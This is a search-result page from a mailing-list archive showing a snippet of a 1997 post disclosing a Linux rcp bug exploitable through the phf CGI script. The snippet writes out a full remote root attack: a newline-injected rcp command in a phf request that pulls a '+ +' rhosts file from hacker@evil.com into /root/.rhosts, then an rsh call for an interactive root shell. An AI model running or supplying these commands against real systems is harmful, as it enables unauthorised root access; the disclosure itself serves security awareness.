Displaying 1 result from an estimated 1 matches for "0arcp".
Did you mean:
arcp
1997 Feb 03
1
Linux rcp bug
...s passed to the phf script,
it can execute arbitrary programs as user ''nobody''. So the problem with
rcp can be exploited remotely, and root access can be gained from outside,
for instance like this:
$ echo "+ +" > /tmp/my.rhosts
$ echo "GET /cgi-bin/phf?Qalias=x%0arcp+hacker@evil.com:/tmp/my.rhosts+
/root/.rhosts" | nc -v - 20 victim.com 80
$ rsh -l root victim.com "/bin/sh -i"
#
The fact that this bug can be exploited remotely makes it, I think, quite
serious. We wrote a simple script that searched our home domains (*.cz and
*.sk) for machines t...